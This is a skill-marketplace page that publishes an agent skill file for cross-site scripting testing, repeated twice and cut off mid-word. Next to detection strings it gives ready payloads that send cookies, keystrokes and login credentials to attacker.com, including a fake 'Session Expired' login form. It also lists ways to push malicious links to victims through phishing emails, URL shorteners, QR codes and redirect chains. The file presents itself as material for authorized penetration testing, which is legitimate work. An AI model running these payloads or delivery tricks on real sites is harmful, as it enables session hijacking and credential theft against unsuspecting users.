Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

ranbot-ai/xss-html-injection

Name: xss-html-injection
Author: ranbot-ai

skills/xss-html-injection/SKILL.md

npx skillsauth add ranbot-ai/awesome-skills xss-html-injection

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

Cross-Site Scripting and HTML Injection Testing

Purpose

Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.

Inputs / Prerequisites

Required Access

Target web application URL with user input fields
Burp Suite or browser developer tools for request analysis
Access to create test accounts for stored XSS testing
Browser with JavaScript console enabled

Technical Requirements

Understanding of JavaScript execution in browser context
Knowledge of HTML DOM structure and manipulation
Familiarity with HTTP request/response headers
Understanding of cookie attributes and session management

Legal Prerequisites

Written authorization for security testing
Defined scope including target domains and features
Agreement on handling of any captured session data
Incident response procedures established

Outputs / Deliverables

XSS/HTMLi vulnerability report with severity classifications
Proof-of-concept payloads demonstrating impact
Session hijacking demonstrations (controlled environment)
Remediation recommendations with CSP configurations

Core Workflow

Phase 1: Vulnerability Detection

Identify Input Reflection Points

Locate areas where user input is reflected in responses:

# Common injection vectors
- Search boxes and query parameters
- User profile fields (name, bio, comments)
- URL fragments and hash values
- Error messages displaying user input
- Form fields with client-side validation only
- Hidden form fields and parameters
- HTTP headers (User-Agent, Referer)

Basic Detection Testing

Insert test strings to observe application behavior:

<!-- Basic reflection test -->
<test123>

<!-- Script tag test -->
<script>alert('XSS')</script>

<!-- Event handler test -->
<img src=x onerror=alert('XSS')>

<!-- SVG-based test -->
<svg onload=alert('XSS')>

<!-- Body event test -->
<body onload=alert('XSS')>

Monitor for:

Raw HTML reflection without encoding
Partial encoding (some characters escaped)
JavaScript execution in browser console
DOM modifications visible in inspector

Determine XSS Type

Stored XSS Indicators:

Input persists after page refresh
Other users see injected content
Content stored in database/filesystem

Reflected XSS Indicators:

Input appears only in current response
Requires victim to click crafted URL
No persistence across sessions

DOM-Based XSS Indicators:

Input processed by client-side JavaScript
Server response doesn't contain payload
Exploitation occurs entirely in browser

Phase 2: Stored XSS Exploitation

Identify Storage Locations

Target areas with persistent user content:

- Comment sections and forums
- User profile fields (display name, bio, location)
- Product reviews and ratings
- Private messages and chat systems
- File upload metadata (filename, description)
- Configuration settings and preferences

Craft Persistent Payloads

<!-- Cookie stealing payload -->
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>

<!-- Keylogger injection -->
<script>
document.onkeypress=function(e){
  new Image().src='http://attacker.com/log?k='+e.key;
}
</script>

<!-- Session hijacking -->
<script>
fetch('http://attacker.com/capture',{
  method:'POST',
  body:JSON.stringify({cookies:document.cookie,url:location.href})
})
</script>

<!-- Phishing form injection -->
<div id="login">
<h2>Session Expired - Please Login</h2>
<form action="http://attacker.com/phish" method="POST">
Username: <input name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>
</div>

Phase 3: Reflected XSS Exploitation

Construct Malicious URLs

Build URLs containing XSS payloads:

# Basic reflected payload
https://target.com/search?q=<script>alert(document.domain)</script>

# URL-encoded payload
https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E

# Event handler in parameter
https://target.com/page?name="><img src=x onerror=alert(1)>

# Fragment-based (for DOM XSS)
https://target.com/page#<script>alert(1)</script>

Delivery Methods

Techniques for delivering reflected XSS to victims:

1. Phishing emails with crafted links
2. Social media message distribution
3. URL shorteners to obscure payload
4. QR codes encoding malicious URLs
5. Redirect chains through trusted domains

Phase 4: DOM-Based XSS Exploitation

Identify Vulnerable Sinks

Locate JavaScript functions that process user input:

// Dangerous sinks
document.write()
document.writeln()
element.innerHTML
element.outerHTML
element.inser

ranbot-ai/xss-html-injection

skills/xss-html-injection/SKILL.md

This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection...

4 stars

tools

Updated May 5, 2026

$ install --global

skillsauth

npx skillsauth add ranbot-ai/awesome-skills xss-html-injection

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: May 5, 2026, 6:11 AM129.7s1 file scanned

SKILL.md

name:: xss-html-injection
description:: This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection...
category:: Security & Systems
source:: antigravity
tags:: [javascript, api, ai, agent, workflow, template, document, image, security, vulnerability]
url:: https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/xss-html-injection

Cross-Site Scripting and HTML Injection Testing

Purpose

Inputs / Prerequisites

Required Access

Target web application URL with user input fields
Burp Suite or browser developer tools for request analysis
Access to create test accounts for stored XSS testing
Browser with JavaScript console enabled

Technical Requirements

Understanding of JavaScript execution in browser context
Knowledge of HTML DOM structure and manipulation
Familiarity with HTTP request/response headers
Understanding of cookie attributes and session management

Legal Prerequisites

Written authorization for security testing
Defined scope including target domains and features
Agreement on handling of any captured session data
Incident response procedures established

Outputs / Deliverables

XSS/HTMLi vulnerability report with severity classifications
Proof-of-concept payloads demonstrating impact
Session hijacking demonstrations (controlled environment)
Remediation recommendations with CSP configurations

Core Workflow

Phase 1: Vulnerability Detection

Identify Input Reflection Points

Locate areas where user input is reflected in responses:

# Common injection vectors
- Search boxes and query parameters
- User profile fields (name, bio, comments)
- URL fragments and hash values
- Error messages displaying user input
- Form fields with client-side validation only
- Hidden form fields and parameters
- HTTP headers (User-Agent, Referer)

Basic Detection Testing

Insert test strings to observe application behavior:

<!-- Basic reflection test -->
<test123>

<!-- Script tag test -->
<script>alert('XSS')</script>

<!-- Event handler test -->
<img src=x onerror=alert('XSS')>

<!-- SVG-based test -->
<svg onload=alert('XSS')>

<!-- Body event test -->
<body onload=alert('XSS')>

Monitor for:

Raw HTML reflection without encoding
Partial encoding (some characters escaped)
JavaScript execution in browser console
DOM modifications visible in inspector

Determine XSS Type

Stored XSS Indicators:

Input persists after page refresh
Other users see injected content
Content stored in database/filesystem

Reflected XSS Indicators:

Input appears only in current response
Requires victim to click crafted URL
No persistence across sessions

DOM-Based XSS Indicators:

Input processed by client-side JavaScript
Server response doesn't contain payload
Exploitation occurs entirely in browser

Phase 2: Stored XSS Exploitation

Identify Storage Locations

Target areas with persistent user content:

- Comment sections and forums
- User profile fields (display name, bio, location)
- Product reviews and ratings
- Private messages and chat systems
- File upload metadata (filename, description)
- Configuration settings and preferences

Craft Persistent Payloads

<!-- Cookie stealing payload -->
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>

<!-- Keylogger injection -->
<script>
document.onkeypress=function(e){
  new Image().src='http://attacker.com/log?k='+e.key;
}
</script>

<!-- Session hijacking -->
<script>
fetch('http://attacker.com/capture',{
  method:'POST',
  body:JSON.stringify({cookies:document.cookie,url:location.href})
})
</script>

<!-- Phishing form injection -->
<div id="login">
<h2>Session Expired - Please Login</h2>
<form action="http://attacker.com/phish" method="POST">
Username: <input name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>
</div>

Phase 3: Reflected XSS Exploitation

Construct Malicious URLs

Build URLs containing XSS payloads:

# Basic reflected payload
https://target.com/search?q=<script>alert(document.domain)</script>

# URL-encoded payload
https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E

# Event handler in parameter
https://target.com/page?name="><img src=x onerror=alert(1)>

# Fragment-based (for DOM XSS)
https://target.com/page#<script>alert(1)</script>

Delivery Methods

Techniques for delivering reflected XSS to victims:

1. Phishing emails with crafted links
2. Social media message distribution
3. URL shorteners to obscure payload
4. QR codes encoding malicious URLs
5. Redirect chains through trusted domains

Phase 4: DOM-Based XSS Exploitation

Identify Vulnerable Sinks

Locate JavaScript functions that process user input:

// Dangerous sinks
document.write()
document.writeln()
element.innerHTML
element.outerHTML
element.inser

Related Skills

ranbot-ai/nextjs-seo-indexing

testing

VerifiedTrustedCommunity

Fix SEO indexing issues, crawl budget problems, and Search Console coverage errors for Next.js apps. Covers canonical tags, noindex audits, sitemap health, static rendering, and internal linking.

5SKILL.mdUpdated Jun 2, 2026

ranbot-ai/nextjs-seo-indexing

ranbot-ai/moatmri

data-ai

VerifiedTrustedCommunity

Analyze AI disruption pressure across a business, map competitive exposure, and produce a 90-day defensive action plan.

5SKILL.mdUpdated Jun 2, 2026

ranbot-ai/skills/longbridge

tools

VerifiedTrustedCommunity

--- name: longbridge description: 125+ agent skills for Longbridge Securities — real-time quotes, charts, fundamentals, portfolio analysis, options, and more for HK/US/A-share/SG markets. Trilingual: Simplified Chinese, Traditional category: AI & Agents source: antigravity tags: [api, mcp, claude, ai, agent, security, cro] url: https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/longbridge --- # Longbridge ## Overview Longbridge is the official skill collection for Longbr

5SKILL.mdUpdated Jun 2, 2026

ranbot-ai/skills/longbridge

ranbot-ai/github-actions-advanced

tools

VerifiedTrustedCommunity

Design, debug, and harden GitHub Actions CI/CD workflows, including reusable workflows, matrix builds, self-hosted runners, OIDC authentication, caching, environments, secrets, and release automation.

5SKILL.mdUpdated Jun 2, 2026

ranbot-ai/github-actions-advanced

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/ranbot-ai/awesome-skills.git

# Copy into Claude Code skills folder (global)
cp -r awesome-skills/skills/xss-html-injection ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

ranbot-ai/awesome-skills

4 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT